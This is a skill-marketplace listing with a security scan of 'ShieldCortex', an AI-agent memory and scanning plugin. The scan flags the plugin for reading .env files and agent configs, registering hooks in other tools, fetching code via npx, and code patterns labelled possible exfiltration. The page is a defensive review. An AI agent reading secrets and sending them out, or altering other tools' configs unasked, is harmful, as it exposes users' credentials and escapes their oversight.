Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
ShieldCortex
v4.9.1Persistent memory and security system for AI agents. Stores memories with semantic search, knowledge graphs, and decay. Scans agent inputs/outputs for prompt...
⭐ 1· 1.2k·5 current·5 all-time
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
OpenClaw
Suspicious
medium confidencePurpose & Capability
Name/description (persistent memory + security scanning) matches the included code and hook behavior: it installs a local CLI (or uses npx), reads/writes a local ~/.shieldcortex DB, and provides OpenClaw hooks for automatic memory extraction and realtime scanning. Requesting read/write access to the agent config directories (~/.claude, ~/.openclaw, ~/.cursor, etc.) and writing its own extension under ~/.openclaw/extensions is coherent for a memory/security integration, but touching multiple agent tool configs (MCP registration and lifecycle handlers) is higher-privilege than a simple 'git-commit-helper' would need — it is explainable for this purpose but worth noting.
Instruction Scope
SKILL.md and bundled hooks instruct reading many agent/project files (including $CWD/.env for secret-detection, transcripts, MCP configs, and multiple home- and project-level directories) and to register lifecycle handlers in other tools' settings (e.g., ~/.claude/settings.json) during setup. It auto-extracts session transcripts and can auto-save memories (enabled by default). These actions are functional for a memory/security tool but broaden the skill's access surface (possible capture of secrets/PII, modification of other tools' configs) and rely on user confirmation — the instructions are not minimal and grant broad read/write scope.
Install Mechanism
No installer archive or external URL is bundled; the package relies on the shieldcortex CLI and falls back to 'npx -y shieldcortex' on first use. Using npm/npx is a traceable, common mechanism, but it will fetch and execute code from the npm registry at runtime if the CLI isn't installed locally, creating a network activity vector the user should be aware of. The bundled runtime/plugin code is present for inspection.
Credentials
The skill declares no required env vars or credentials for local use, and cloud sync/API keys are optional. However, it reads project-level env files ($CWD/.env) and numerous tool config directories, and it can be configured (or prompted) to accept a cloud API key for forwarding scans. Writing to MCP registries and other tools' config files is optional but present in instructions. The requested read/write filesystem scope and the optional cloud key are proportionate to a full-featured memory/security product but are higher-sensitivity than a minimal skill; users should not enable cloud sync or MCP writes unless they trust the publisher and have reviewed configs.
Persistence & Privilege
always:false (normal). The skill registers lifecycle/event handlers during setup (writes to other tools' settings) so it can persistently run on agent prompts; this is explicit and removable but does create ongoing local presence and automated behavior. Autonomous invocation of the skill by the agent is allowed by default (platform default) — combining persistent hooks with broad file access increases blast radius if misused, but the skill documents manual opt-in and removal steps.
What to consider before installing
ShieldCortex appears to implement what it claims (local memory + realtime scanning) and includes inspectable plugin code, but it also: (1) reads many project/home config files (including $CWD/.env), (2) can register lifecycle hooks and modify other tools' config files during setup, and (3) will fetch the shieldcortex package via npx if the CLI is not installed — causing runtime network fetches. Before installing: verify the publisher/source (check the GitHub repo and package on npm), review the bundled code and the config it will write (~/.shieldcortex and any MCP files), disable auto-save/auto-memory if you prefer manual control, do not enable cloud sync unless you trust the service and have reviewed its privacy policy, and back up any config files the installer may modify. If you lack confidence in the publisher, run initial testing in an isolated environment or container so you can inspect what files are read/written and whether any network calls occur.bundled/cortex-memory-hook/runtime.mjs:50
Shell command execution detected (child_process).
bundled/openclaw-plugin/index.js:43
Shell command execution detected (child_process).
bundled/openclaw-plugin/index.js:36
Environment variable access combined with network send.
bundled/openclaw-plugin/index.js:11
File read combined with network send (possible exfiltration).
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.Like a lobster shell, security has layers — review code before you run it.
latestvk97bfh5d8wxayv42k9af6pvdxn84yrr5
License
MIT-0
Free to use, modify, and redistribute. No attribution required.